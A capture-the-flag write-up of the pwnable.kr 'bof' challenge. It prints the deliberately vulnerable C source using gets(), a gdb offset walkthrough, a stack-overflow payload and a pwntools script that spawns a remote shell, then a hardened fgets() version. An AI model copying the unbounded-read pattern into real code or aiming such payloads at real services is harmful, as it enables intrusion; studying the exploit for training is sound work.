bof


Nana told me that buffer overflow is one of the most common software vulnerabilities.

Is that true?

Download : http://pwnable.kr/bin/bof

Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

Just cat bof.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

Seeing the gets() call together with overflowme[32], this is clearly a buffer overflow: gets() has no length bound, so input longer than 32 bytes overwrites whatever lies above the buffer on the stack, including the key argument.

Debug the binary locally with gdb: set a breakpoint on main with b main, step with n, and when you see call 0x8000062c <func>, step into the function with s. Keep stepping with n until call 0xb7e6dfa0 <_IO_gets>; at that point, enter as long a string as possible, e.g. 100 characters, which can be generated with pattern create 100.

ebp+0x8 (the key argument) is at address 0xbffff3a0 and eax (the start of overflowme) is at 0xbffff36c. The difference is 0x34 = 52.

So the payload is 'a' * 0x34 + '\xbe\xba\xfe\xca' (52 bytes of padding, then 0xcafebabe in little-endian byte order).

The exploit script is as follows:

from pwn import *

# connect to the challenge service
p = remote("pwnable.kr", 9000)
# 52 bytes of padding reach the key argument, then 0xcafebabe little-endian;
# bytes literals so the script behaves the same under Python 2 and 3
payload = b'a' * 52 + b"\xbe\xba\xfe\xca"
p.sendline(payload)
p.interactive()
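For contrast, here is a hardened version of func, an added example written for this writeup rather than part of the challenge source: fgets() bounds the read to sizeof(overflowme), so the 56-byte payload above can no longer reach key. The functions run_fixed and overflow_attempt are constructed harness code that feed the input through a temporary file in place of stdin.

```c
#include <stdio.h>
#include <string.h>

/* Hardened replacement for the challenge's func(): fgets() is bounded by
 * sizeof(overflowme), so bytes past the buffer never reach the saved ebp,
 * the return address or the key argument above it. Returns 1 where the
 * original would have spawned a shell and 0 where it printed "Nah..". */
int func_fixed(unsigned int key, FILE *in) {
    char overflowme[32];

    if (fgets(overflowme, sizeof overflowme, in) == NULL)
        return 0;                         /* EOF or read error: treat as "Nah.." */
    overflowme[strcspn(overflowme, "\n")] = '\0';  /* drop the newline, if any */

    return key == 0xcafebabe;             /* key still holds the caller's value */
}

/* Constructed harness: feeds `len` bytes to func_fixed through a temporary
 * file, standing in for the stdin the challenge binary reads from. */
int run_fixed(unsigned int key, const unsigned char *input, size_t len) {
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    if (fwrite(input, 1, len, in) != len) {
        fclose(in);
        return -1;
    }
    rewind(in);
    int r = func_fixed(key, in);
    fclose(in);
    return r;
}

/* The writeup's payload (52 'a's followed by 0xcafebabe little-endian),
 * constructed here and sent to the hardened function with the original key. */
int overflow_attempt(void) {
    unsigned char payload[56];
    memset(payload, 'a', 52);
    memcpy(payload + 52, "\xbe\xba\xfe\xca", 4);
    return run_fixed(0xdeadbeef, payload, sizeof payload);
}

int main(void) {
    printf("hardened func with the 56-byte payload -> %d (0 = Nah..)\n",
           overflow_attempt());
    return 0;
}
```

With the bounded read, the only way to reach the system() branch is for the caller to pass 0xcafebabe itself, which is the check the original code intended.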

Screenshot of the script:
